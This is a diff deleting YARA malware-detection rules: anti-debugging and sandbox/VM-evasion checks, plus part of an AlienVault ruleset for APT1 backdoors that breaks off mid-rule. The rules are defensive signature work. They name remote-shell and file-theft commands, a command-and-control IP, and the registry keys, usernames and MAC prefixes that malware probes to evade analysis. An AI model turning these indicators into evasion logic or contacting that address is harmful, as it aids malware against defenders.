-		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
-	strings:
-		$ ="QueryInformationProcess"
-	condition:
-		any of them
-}
-
-rule DebuggerCheck__RemoteAPI : AntiDebug DebuggerCheck {
-	meta:
-		weight = 1
-		Author = "naxonez"
-		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
-	strings:
-		$ ="CheckRemoteDebuggerPresent"
-	condition:
-		any of them
-}
-
-rule DebuggerHiding__Thread : AntiDebug DebuggerHiding {
-	meta:
-	    Author = "naxonez"
-		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
-		weight = 1
-	strings:
-		$ ="SetInformationThread"
-	condition:
-		any of them
-}
-
-rule DebuggerHiding__Active : AntiDebug DebuggerHiding {
-	meta:
-		weight = 1
-		Author = "naxonez"
-		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
-	strings:
-		$ ="DebugActiveProcess"
-	condition:
-		any of them
-}
-
-rule DebuggerTiming__PerformanceCounter : AntiDebug DebuggerTiming {
-	meta:
-		weight = 1
-		Author = "naxonez"
-		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
-	strings:
-		$ ="QueryPerformanceCounter"
-	condition:
-		any of them
-}
-
-rule DebuggerTiming__Ticks : AntiDebug DebuggerTiming {
-	meta:
-		weight = 1
-		Author = "naxonez"
-		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
-	strings:
-		$ ="GetTickCount"
-	condition:
-		any of them
-}
-
-rule DebuggerOutput__String : AntiDebug DebuggerOutput {
-	meta:
-		weight = 1
-		Author = "naxonez"
-		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
-	strings:
-		$ ="OutputDebugString"
-	condition:
-		any of them
-}
-
-rule DebuggerException__UnhandledFilter : AntiDebug DebuggerException {
-	meta:
-		weight = 1
-		Author = "naxonez"
-		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
-	strings:
-		$ ="SetUnhandledExceptionFilter"
-	condition:
-		any of them
-}
-
-rule DebuggerException__ConsoleCtrl : AntiDebug DebuggerException {
-	meta:
-		weight = 1
-		Author = "naxonez"
-		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
-	strings:
-		$ ="GenerateConsoleCtrlEvent"
-	condition:
-		any of them
-}
-
-rule DebuggerException__SetConsoleCtrl : AntiDebug DebuggerException {
-	meta:
-		weight = 1
-		Author = "naxonez"
-		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
-	strings:
-		$ ="SetConsoleCtrlHandler"
-	condition:
-		any of them
-}
-
-rule ThreadControl__Context : AntiDebug ThreadControl {
-	meta:
-		weight = 1
-		Author = "naxonez"
-		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
-	strings:
-		$ ="SetThreadContext"
-	condition:
-		any of them
-}
-
-rule DebuggerCheck__DrWatson : AntiDebug DebuggerCheck {
-	meta:
-		weight = 1
-		Author = "naxonez"
-		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
-	strings:
-		$ ="__invoke__watson"
-	condition:
-		any of them
-}
-
-rule SEH__v3 : AntiDebug SEH {
-	meta:
-		weight = 1
-		Author = "naxonez"
-		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
-	strings:
-		$ = "____except__handler3"
-		$ = "____local__unwind3"
-	condition:
-		any of them
-}
-
-rule SEH__v4 : AntiDebug SEH {
-    // VS 8.0+
-	meta:
-		weight = 1
-		Author = "naxonez"
-		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
-	strings:
-		$ = "____except__handler4"
-		$ = "____local__unwind4"
-		$ = "__XcptFilter"
-	condition:
-		any of them
-}
-
-rule SEH__vba : AntiDebug SEH {
-	meta:
-		weight = 1
-		Author = "naxonez"
-		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
-	strings:
-		$ = "vbaExceptHandler"
-	condition:
-		any of them
-}
-
-rule SEH__vectored : AntiDebug SEH {
-	meta:
-		weight = 1
-		Author = "naxonez"
-		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
-	strings:
-		$ = "AddVectoredExceptionHandler"
-		$ = "RemoveVectoredExceptionHandler"
-	condition:
-		any of them
-}
-
-
-rule DebuggerPattern__RDTSC : AntiDebug DebuggerPattern {
-	meta:
-		weight = 1
-		Author = "naxonez"
-		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
-	strings:
-		$ = {0F 31}
-	condition:
-		any of them
-}
-
-rule DebuggerPattern__CPUID : AntiDebug DebuggerPattern {
-	meta:
-		weight = 1
-		Author = "naxonez"
-		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
-	strings:
-		$ = {0F A2}
-	condition:
-		any of them
-}
-
-rule DebuggerPattern__SEH_Saves : AntiDebug DebuggerPattern {
-	meta:
-		weight = 1
-		Author = "naxonez"
-		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
-	strings:
-		$ = {64 ff 35 00 00 00 00}
-	condition:
-		any of them
-}
-
-rule DebuggerPattern__SEH_Inits : AntiDebug DebuggerPattern {
-	meta:
-		weight = 1
-		Author = "naxonez"
-		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
-	strings:
-		$ = {64 89 25 00 00 00 00}
-	condition:
-		any of them
-}
-
-
-rule Check_Dlls
-{
-	meta:
-		Author = "Nick Hoffman"
-		Description = "Checks for common sandbox dlls"
-		Sample = "de1af0e97e94859d372be7fcf3a5daa5"
-	strings:
-		$dll1 = "sbiedll.dll" wide nocase ascii fullword
-		$dll2 = "dbghelp.dll" wide nocase ascii fullword
-		$dll3 = "api_log.dll" wide nocase ascii fullword
-		$dll4 = "dir_watch.dll" wide nocase ascii fullword
-		$dll5 = "pstorec.dll" wide nocase ascii fullword
-		$dll6 = "vmcheck.dll" wide nocase ascii fullword
-		$dll7 = "wpespy.dll" wide nocase ascii fullword
-	condition:
-		2 of them
-}
-
-rule Check_Qemu_Description
-{
-	meta:
-		Author = "Nick Hoffman"
-		Description = "Checks for QEMU systembiosversion key"
-		Sample = "de1af0e97e94859d372be7fcf3a5daa5"
-	strings:
-		$key = "HARDWARE\\Description\\System" nocase wide ascii
-		$value = "SystemBiosVersion" nocase wide ascii
-		$data = "QEMU" wide nocase ascii
-	condition:
-		all of them
-}
-
-rule Check_Qemu_DeviceMap
-{
-	meta:
-		Author = "Nick Hoffman"
-		Description = "Checks for Qemu reg keys"
-		Sample = "de1af0e97e94859d372be7fcf3a5daa5"
-	strings:
-		$key = "HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0" nocase wide ascii
-		$value = "Identifier" nocase wide ascii
-		$data = "QEMU" wide nocase ascii
-	condition:
-		all of them
-}
-
-rule Check_VBox_Description
-{
-	meta:
-		Author = "Nick Hoffman"
-		Description = "Checks Vbox description reg key"
-		Sample = "de1af0e97e94859d372be7fcf3a5daa5"
-	strings:
-		$key = "HARDWARE\\Description\\System" nocase wide ascii
-		$value = "SystemBiosVersion" nocase wide ascii
-		$data = "VBOX" nocase wide ascii		
-	condition:
-		all of them
-}
-rule Check_VBox_DeviceMap
-{
-	meta:
-		Author = "Nick Hoffman"
-		Description = "Checks Vbox registry keys"
-		Sample = "de1af0e97e94859d372be7fcf3a5daa5"
-	strings:
-		$key = "HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0" nocase wide ascii
-		$value = "Identifier" nocase wide ascii
-		$data = "VBOX" nocase wide ascii
-	condition:
-		all of them
-}
-rule Check_VBox_Guest_Additions
-{
-	meta:
-		Author = "Nick Hoffman"
-		Description = "Checks for the existence of the guest additions registry key"
-		Sample = "de1af0e97e94859d372be7fcf3a5daa5"
-	strings:
-		$key = "SOFTWARE\\Oracle\\VirtualBox Guest Additions" wide ascii nocase
-	condition:
-		any of them	
-}
-rule Check_VBox_VideoDrivers
-{
-	meta:
-		Author = "Nick Hoffman"
-		Description = "Checks for reg keys of Vbox video drivers"
-		Sample = "de1af0e97e94859d372be7fcf3a5daa5"
-	strings:
-		$key = "HARDWARE\\Description\\System" nocase wide ascii
-		$value = "VideoBiosVersion" wide nocase ascii
-		$data = "VIRTUALBOX" nocase wide ascii
-	condition:
-		all of them
-}
-rule Check_VMWare_DeviceMap
-{
-	meta:
-		Author = "Nick Hoffman"
-		Description = "Checks for the existence of VmWare Registry Keys"
-		Sample = "de1af0e97e94859d372be7fcf3a5daa5"
-	strings:
-		$key = "HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0" wide ascii nocase
-		$value = "Identifier" wide nocase ascii
-		$data = "VMware" wide nocase ascii
-	condition:
-		all of them
-}
-rule Check_VmTools
-{
-	meta:
-		Author = "Nick Hoffman"
-		Description = "Checks for the existence of VmTools reg key"
-		Sample = "de1af0e97e94859d372be7fcf3a5daa5"
-	strings:
-		$ ="SOFTWARE\\VMware, Inc.\\VMware Tools" nocase ascii wide
-	condition:
-		any of them
-}
-rule Check_Wine
-{
-	meta:
-		Author = "Nick Hoffman"
-		Description = "Checks for the existence of Wine"
-		Sample = "de1af0e97e94859d372be7fcf3a5daa5"
-	strings:
-		$ ="wine_get_unix_file_name"
-	condition:
-		any of them
-}
-
-rule vmdetect
-{
-    meta:
-        author = "nex"
-        description = "Possibly employs anti-virtualization techniques"
-
-    strings:
-        // Binary tricks
-        $vmware = {56 4D 58 68}
-        $virtualpc = {0F 3F 07 0B}
-        $ssexy = {66 0F 70 ?? ?? 66 0F DB ?? ?? ?? ?? ?? 66 0F DB ?? ?? ?? ?? ?? 66 0F EF}
-        $vmcheckdll = {45 C7 00 01}
-        $redpill = {0F 01 0D 00 00 00 00 C3}
-
-        // Random strings
-        $vmware1 = "VMXh"
-        $vmware2 = "Ven_VMware_" nocase
-        $vmware3 = "Prod_VMware_Virtual_" nocase
-        $vmware4 = "hgfs.sys" nocase
-        $vmware5 = "mhgfs.sys" nocase
-        $vmware6 = "prleth.sys" nocase
-        $vmware7 = "prlfs.sys" nocase
-        $vmware8 = "prlmouse.sys" nocase
-        $vmware9 = "prlvideo.sys" nocase
-        $vmware10 = "prl_pv32.sys" nocase
-        $vmware11 = "vpc-s3.sys" nocase
-        $vmware12 = "vmsrvc.sys" nocase
-        $vmware13 = "vmx86.sys" nocase
-        $vmware14 = "vmnet.sys" nocase
-        $vmware15 = "vmicheartbeat" nocase
-        $vmware16 = "vmicvss" nocase
-        $vmware17 = "vmicshutdown" nocase
-        $vmware18 = "vmicexchange" nocase
-        $vmware19 = "vmdebug" nocase
-        $vmware20 = "vmmouse" nocase
-        $vmware21 = "vmtools" nocase
-        $vmware22 = "VMMEMCTL" nocase
-        $vmware23 = "vmx86" nocase
-        $vmware24 = "vmware" nocase
-        $virtualpc1 = "vpcbus" nocase
-        $virtualpc2 = "vpc-s3" nocase
-        $virtualpc3 = "vpcuhub" nocase
-        $virtualpc4 = "msvmmouf" nocase
-        $xen1 = "xenevtchn" nocase
-        $xen2 = "xennet" nocase
-        $xen3 = "xennet6" nocase
-        $xen4 = "xensvc" nocase
-        $xen5 = "xenvdb" nocase
-        $xen6 = "XenVMM" nocase
-        $virtualbox1 = "VBoxHook.dll" nocase
-        $virtualbox2 = "VBoxService" nocase
-        $virtualbox3 = "VBoxTray" nocase
-        $virtualbox4 = "VBoxMouse" nocase
-        $virtualbox5 = "VBoxGuest" nocase
-        $virtualbox6 = "VBoxSF" nocase
-        $virtualbox7 = "VBoxGuestAdditions" nocase
-        $virtualbox8 = "VBOX HARDDISK"  nocase
-
-        // MAC addresses
-        $vmware_mac_1a = "00-05-69"
-        $vmware_mac_1b = "00:05:69"
-        $vmware_mac_1c = "000569"
-        $vmware_mac_2a = "00-50-56"
-        $vmware_mac_2b = "00:50:56"
-        $vmware_mac_2c = "005056"
-        $vmware_mac_3a = "00-0C-29" nocase
-        $vmware_mac_3b = "00:0C:29" nocase
-        $vmware_mac_3c = "000C29" nocase
-        $vmware_mac_4a = "00-1C-14" nocase
-        $vmware_mac_4b = "00:1C:14" nocase
-        $vmware_mac_4c = "001C14" nocase
-        $virtualbox_mac_1a = "08-00-27"
-        $virtualbox_mac_1b = "08:00:27"
-        $virtualbox_mac_1c = "080027"
-
-    condition:
-        any of them
-}
-
-rule Check_Debugger
-{
-	meta:
-		Author = "Nick Hoffman"
-		Description = "Looks for both isDebuggerPresent and CheckRemoteDebuggerPresent"
-		Sample = "de1af0e97e94859d372be7fcf3a5daa5"
-	condition:
-		pe.imports("kernel32.dll","CheckRemoteDebuggerPresent") and 
-		pe.imports("kernel32.dll","IsDebuggerPresent")
-}
-
-rule Check_DriveSize
-{
-	meta:
-		Author = "Nick Hoffman"
-		Description = "Rule tries to catch uses of DeviceIOControl being used to get the drive size"
-		Sample = "de1af0e97e94859d372be7fcf3a5daa5"
-
-	strings:
-		$physicaldrive = "\\\\.\\PhysicalDrive0" wide ascii nocase
-		$dwIoControlCode = {68 5c 40 07 00 [0-5] FF 15} //push 7405ch ; push esi (handle) then call deviceoiocontrol IOCTL_DISK_GET_LENGTH_INFO	
-	condition:
-		pe.imports("kernel32.dll","CreateFileA") and 	
-		pe.imports("kernel32.dll","DeviceIoControl") and 
-		$dwIoControlCode and
-		$physicaldrive
-}
-rule Check_FilePaths
-{
-	meta:
-		Author = "Nick Hoffman"
-		Description = "Checks for filepaths containing popular sandbox names"
-		Sample = "de1af0e97e94859d372be7fcf3a5daa5"
-	strings: 
-		$path1 = "SANDBOX" wide ascii
-		$path2 = "\\SAMPLE" wide ascii
-		$path3 = "\\VIRUS" wide ascii
-	condition:
-		all of ($path*) and pe.imports("kernel32.dll","GetModuleFileNameA")
-}
-
-rule Check_UserNames
-{
-	meta:
-		Author = "Nick Hoffman"
-		Description = "Looks for malware checking for common sandbox usernames"
-		Sample = "de1af0e97e94859d372be7fcf3a5daa5"
-	strings:
-		$user1 = "MALTEST" wide ascii
-		$user2 = "TEQUILABOOMBOOM" wide ascii
-		$user3 = "SANDBOX" wide ascii
-		$user4 = "VIRUS" wide ascii
-		$user5 = "MALWARE" wide ascii
-	condition:
-		all of ($user*)  and pe.imports("advapi32.dll","GetUserNameA")
-}
-
-
-rule Check_OutputDebugStringA_iat
-{
-
-	meta:
-		Author = "http://twitter.com/j0sm1"
-		Description = "Detect in IAT OutputDebugstringA"
-		Date = "20/04/2015"
-
-	condition:
-		pe.imports("kernel32.dll","OutputDebugStringA")
-}
-
-rule Check_unhandledExceptionFiler_iat {
-
-	meta:
-		Author = "http://twitter.com/j0sm1"
-		Description = "it's checked if UnhandledExceptionFilter is imported" 
-		Date = "20/04/2015"
-		Reference = "http://www.codeproject.com/Articles/30815/An-Anti-Reverse-Engineering-Guide#UnhandledExceptionFilter"
-		
-	condition:
-		pe.imports("kernel32.dll","UnhandledExceptionFilter")	
-}
-
-rule check_RaiseException_iat {
-
-	meta:
-		Author = "http://twitter.com/j0sm1"
-		Description = "it's checked if RaiseException is imported" 
-		Date = "20/04/2015"
-		Reference = "http://waleedassar.blogspot.com.es/2012/11/ollydbg-raiseexception-bug.html"
-		
-	condition:
-		pe.imports("kernel32.dll","RaiseException")	
-}
-
-rule Check_FindWindowA_iat {
-
-	meta:
-		Author = "http://twitter.com/j0sm1"
-		Description = "it's checked if FindWindowA() is imported" 
-		Date = "20/04/2015"
-		Reference = "http://www.codeproject.com/Articles/30815/An-Anti-Reverse-Engineering-Guide#OllyFindWindow"
-		
-	strings:
-		$ollydbg = "OLLYDBG"
-		$windbg = "WinDbgFrameClass"
-		
-	condition:
-		pe.imports("user32.dll","FindWindowA") and ($ollydbg or $windbg)
-}
-
-
diff -Nru remnux-rules-0.0.3/yara/APT1.yara remnux-rules-0.0.4/yara/APT1.yara
--- remnux-rules-0.0.3/yara/APT1.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/APT1.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,1172 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule LIGHTDART_APT1 {
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-        strings:
-                $s1 = "ret.log" wide ascii
-                $s2 = "Microsoft Internet Explorer 6.0" wide ascii
-                $s3 = "szURL Fail" wide ascii
-                $s4 = "szURL Successfully" wide ascii
-                $s5 = "%s&sdate=%04ld-%02ld-%02ld" wide ascii
-        condition:
-                all of them
-}
-
-rule AURIGA_APT1 {
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-        strings:
-                $s1 = "superhard corp." wide ascii
-                $s2 = "microsoft corp." wide ascii
-                $s3 = "[Insert]" wide ascii
-                $s4 = "[Delete]" wide ascii
-                $s5 = "[End]" wide ascii
-                $s6 = "!(*@)(!@KEY" wide ascii
-                $s7 = "!(*@)(!@SID=" wide ascii
-        condition:
-                all of them
-}
-
-rule AURIGA_driver_APT1 {
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-        strings:
-                $s1 = "Services\\riodrv32" wide ascii
-                $s2 = "riodrv32.sys" wide ascii
-                $s3 = "svchost.exe" wide ascii
-                $s4 = "wuauserv.dll" wide ascii
-                $s5 = "arp.exe" wide ascii
-                $pdb = "projects\\auriga" wide ascii
-
-        condition:
-                all of ($s*) or $pdb
-}
-
-rule BANGAT_APT1 {
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-        strings:
-                $s1 = "superhard corp." wide ascii
-                $s2 = "microsoft corp." wide ascii
-                $s3 = "[Insert]" wide ascii
-                $s4 = "[Delete]" wide ascii
-                $s5 = "[End]" wide ascii
-                $s6 = "!(*@)(!@KEY" wide ascii
-                $s7 = "!(*@)(!@SID=" wide ascii
-                $s8 = "end      binary output" wide ascii
-                $s9 = "XriteProcessMemory" wide ascii
-                $s10 = "IE:Password-Protected sites" wide ascii
-                $s11 = "pstorec.dll" wide ascii
-
-        condition:
-                all of them
-}
-
-rule BISCUIT_GREENCAT_APT1 {
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-        strings:
-                $s1 = "zxdosml" wide ascii
-                $s2 = "get user name error!" wide ascii
-                $s3 = "get computer name error!" wide ascii
-                $s4 = "----client system info----" wide ascii
-                $s5 = "stfile" wide ascii
-                $s6 = "cmd success!" wide ascii
-
-        condition:
-                all of them
-}
-
-rule BOUNCER_APT1 {
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-        strings:
-                $s1 = "*Qd9kdgba33*%Wkda0Qd3kvn$*&><(*&%$E#%$#1234asdgKNAg@!gy565dtfbasdg" wide ascii
-                $s2 = "IDR_DATA%d" wide ascii
-
-                $s3 = "asdfqwe123cxz" wide ascii
-                $s4 = "Mode must be 0(encrypt) or 1(decrypt)." wide ascii
-
-        condition:
-                ($s1 and $s2) or ($s3 and $s4)
-
-}
-
-rule BOUNCER_DLL_APT1 {
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-        strings:
-                $s1 = "new_connection_to_bounce():" wide ascii
-                $s2 = "usage:%s IP port [proxip] [port] [key]" wide ascii
-
-        condition:
-                all of them
-}
-
-rule CALENDAR_APT1 {
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-        strings:
-                $s1 = "content" wide ascii
-                $s2 = "title" wide ascii
-                $s3 = "entry" wide ascii
-                $s4 = "feed" wide ascii
-                $s5 = "DownRun success" wide ascii
-                $s6 = "%s@gmail.com" wide ascii
-                $s7 = "<!--%s-->" wide ascii
-
-                $b8 = "W4qKihsb+So=" wide ascii
-                $b9 = "PoqKigY7ggH+VcnqnTcmhFCo9w==" wide ascii
-                $b10 = "8oqKiqb5880/uJLzAsY=" wide ascii
-
-        condition:
-                all of ($s*) or all of ($b*)
-}
-
-rule COMBOS_APT1 {
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-        strings:
-                $s1 = "Mozilla4.0 (compatible; MSIE 7.0; Win32)" wide ascii
-                $s2 = "Mozilla5.1 (compatible; MSIE 8.0; Win32)" wide ascii
-                $s3 = "Delay" wide ascii
-                $s4 = "Getfile" wide ascii
-                $s5 = "Putfile" wide ascii
-                $s6 = "---[ Virtual Shell]---" wide ascii
-                $s7 = "Not Comming From Our Server %s." wide ascii
-
-
-        condition:
-                all of them
-}
-
-rule DAIRY_APT1 {
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-        strings:
-                $s1 = "Mozilla/4.0 (compatible; MSIE 7.0;)" wide ascii
-                $s2 = "KilFail" wide ascii
-                $s3 = "KilSucc" wide ascii
-                $s4 = "pkkill" wide ascii
-                $s5 = "pklist" wide ascii
-
-
-        condition:
-                all of them
-}
-
-rule GLOOXMAIL_APT1 {
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-        strings:
-                $s1 = "Kill process success!" wide ascii
-                $s2 = "Kill process failed!" wide ascii
-                $s3 = "Sleep success!" wide ascii
-                $s4 = "based on gloox" wide ascii
-
-                $pdb = "glooxtest.pdb" wide ascii
-
-        condition:
-                all of ($s*) or $pdb
-}
-
-rule GOGGLES_APT1 {
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-        strings:
-                $s1 = "Kill process success!" wide ascii
-                $s2 = "Kill process failed!" wide ascii
-                $s3 = "Sleep success!" wide ascii
-                $s4 = "based on gloox" wide ascii
-
-                $pdb = "glooxtest.pdb" wide ascii
-
-        condition:
-                all of ($s*) or $pdb
-}
-
-rule HACKSFASE1_APT1 {
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-        strings:
-                $s1 = {cb 39 82 49 42 be 1f 3a}
-
-        condition:
-                all of them
-}
-
-rule HACKSFASE2_APT1 {
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-        strings:
-                $s1 = "Send to Server failed." wide ascii
-                $s2 = "HandShake with the server failed. Error:" wide ascii
-                $s3 = "Decryption Failed. Context Expired." wide ascii
-
-        condition:
-                all of them
-}
-
-rule KURTON_APT1 {
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-        strings:
-                $s1 = "Mozilla/4.0 (compatible; MSIE8.0; Windows NT 5.1)" wide ascii
-                $s2 = "!(*@)(!@PORT!(*@)(!@URL" wide ascii
-                $s3 = "MyTmpFile.Dat" wide ascii
-                $s4 = "SvcHost.DLL.log" wide ascii
-
-        condition:
-                all of them
-}
-
-rule LONGRUN_APT1 {
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-        strings:
-                $s1 = "Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0)" wide ascii
-                $s2 = "%s\\%c%c%c%c%c%c%c" wide ascii
-                $s3 = "wait:" wide ascii
-                $s4 = "Dcryption Error! Invalid Character" wide ascii
-
-        condition:
-                all of them
-}
-
-rule MACROMAIL_APT1 {
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-        strings:
-                $s1 = "svcMsn.dll" wide ascii
-                $s2 = "RundllInstall" wide ascii
-                $s3 = "Config service %s ok." wide ascii
-                $s4 = "svchost.exe" wide ascii
-
-        condition:
-                all of them
-}
-
-rule MANITSME_APT1 {
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-        strings:
-                $s1 = "Install an Service hosted by SVCHOST." wide ascii
-                $s2 = "The Dll file that to be released." wide ascii
-                $s3 = "SYSTEM\\CurrentControlSet\\Services\\" wide ascii
-                $s4 = "svchost.exe" wide ascii
-
-                $e1 = "Man,it's me" wide ascii
-                $e2 = "Oh,shit" wide ascii
-                $e3 = "Hallelujah" wide ascii
-                $e4 = "nRet == SOCKET_ERROR" wide ascii
-
-                $pdb1 = "rouji\\release\\Install.pdb" wide ascii
-                $pdb2 = "rouji\\SvcMain.pdb" wide ascii
-
-        condition:
-                (all of ($s*)) or (all of ($e*)) or $pdb1 or $pdb2
-}
-
-rule MINIASP_APT1 {
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-        strings:
-                $s1 = "miniasp" wide ascii
-                $s2 = "wakeup=" wide ascii
-                $s3 = "download ok!" wide ascii
-                $s4 = "command is null!" wide ascii
-                $s5 = "device_input.asp?device_t=" wide ascii
-
-
-        condition:
-                all of them
-}
-
-rule NEWSREELS_APT1 {
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-        strings:
-                $s1 = "Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0)" wide ascii
-                $s2 = "name=%s&userid=%04d&other=%c%s" wide ascii
-                $s3 = "download ok!" wide ascii
-                $s4 = "command is null!" wide ascii
-                $s5 = "noclient" wide ascii
-                $s6 = "wait" wide ascii
-                $s7 = "active" wide ascii
-                $s8 = "hello" wide ascii
-
-
-        condition:
-                all of them
-}
-
-rule SEASALT_APT1 {
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-        strings:
-                $s1 = "User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98) KSMM" wide ascii
-                $s2 = "upfileok" wide ascii
-                $s3 = "download ok!" wide ascii
-                $s4 = "upfileer" wide ascii
-                $s5 = "fxftest" wide ascii
-
-
-        condition:
-                all of them
-}
-
-
-rule STARSYPOUND_APT1 {
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-        strings:
-                $s1 = "*(SY)# cmd" wide ascii
-                $s2 = "send = %d" wide ascii
-                $s3 = "cmd.exe" wide ascii
-                $s4 = "*(SY)#" wide ascii
-
-
-        condition:
-                all of them
-}
-
-rule SWORD_APT1 {
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-        strings:
-                $s1 = "@***@*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>>>" wide ascii
-                $s2 = "sleep:" wide ascii
-                $s3 = "down:" wide ascii
-                $s4 = "*========== Bye Bye ! ==========*" wide ascii
-
-
-        condition:
-                all of them
-}
-
-
-rule thequickbrow_APT1 {
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-        strings:
-                $s1 = "thequickbrownfxjmpsvalzydg" wide ascii
-
-
-        condition:
-                all of them
-}
-
-
-rule TABMSGSQL_APT1 {
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-        strings:
-                $s1 = "letusgohtppmmv2.0.0.1" wide ascii
-                $s2 = "Mozilla/4.0 (compatible; )" wide ascii
-                $s3 = "filestoc" wide ascii
-                $s4 = "filectos" wide ascii
-                $s5 = "reshell" wide ascii
-
-        condition:
-                all of them
-}
-
-rule CCREWBACK1
-{
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-  strings:
-    $a = "postvalue" wide ascii
-    $b = "postdata" wide ascii
-    $c = "postfile" wide ascii
-    $d = "hostname" wide ascii
-    $e = "clientkey" wide ascii
-    $f = "start Cmd Failure!" wide ascii
-    $g = "sleep:" wide ascii
-    $h = "downloadcopy:" wide ascii
-    $i = "download:" wide ascii
-    $j = "geturl:" wide ascii
-    $k = "1.234.1.68" wide ascii
-
-  condition:
-    4 of ($a,$b,$c,$d,$e) or $f or 3 of ($g,$h,$i,$j) or $k
-}
-
-rule TrojanCookies_CCREW
-{
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-  strings:
-    $a = "sleep:" wide ascii
-    $b = "content=" wide ascii
-    $c = "reqpath=" wide ascii
-    $d = "savepath=" wide ascii
-    $e = "command=" wide ascii
-
-
-  condition:
-    4 of ($a,$b,$c,$d,$e)
-}
-
-rule GEN_CCREW1
-{
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-  strings:
-    $a = "W!r@o#n$g" wide ascii
-    $b = "KerNel32.dll" wide ascii
-
-  condition:
-    any of them
-}
-
-rule Elise
-{
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-  strings:
-    $a = "SetElise.pdb" wide ascii
-
-  condition:
-    $a
-}
-
-rule EclipseSunCloudRAT
-{
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-  strings:
-    $a = "Eclipse_A" wide ascii
-    $b = "\\PJTS\\" wide ascii
-    $c = "Eclipse_Client_B.pdb" wide ascii
-    $d = "XiaoME" wide ascii
-    $e = "SunCloud-Code" wide ascii
-    $f = "/uc_server/data/forum.asp" wide ascii
-
-  condition:
-    any of them
-}
-
-rule MoonProject
-{
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-  strings:
-    $a = "Serverfile is smaller than Clientfile" wide ascii
-    $b = "\\M tools\\" wide ascii
-    $c = "MoonDLL" wide ascii
-        $d = "\\M tools\\" wide ascii
-
-  condition:
-    any of them
-}
-
-rule ccrewDownloader1
-{
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-  strings:
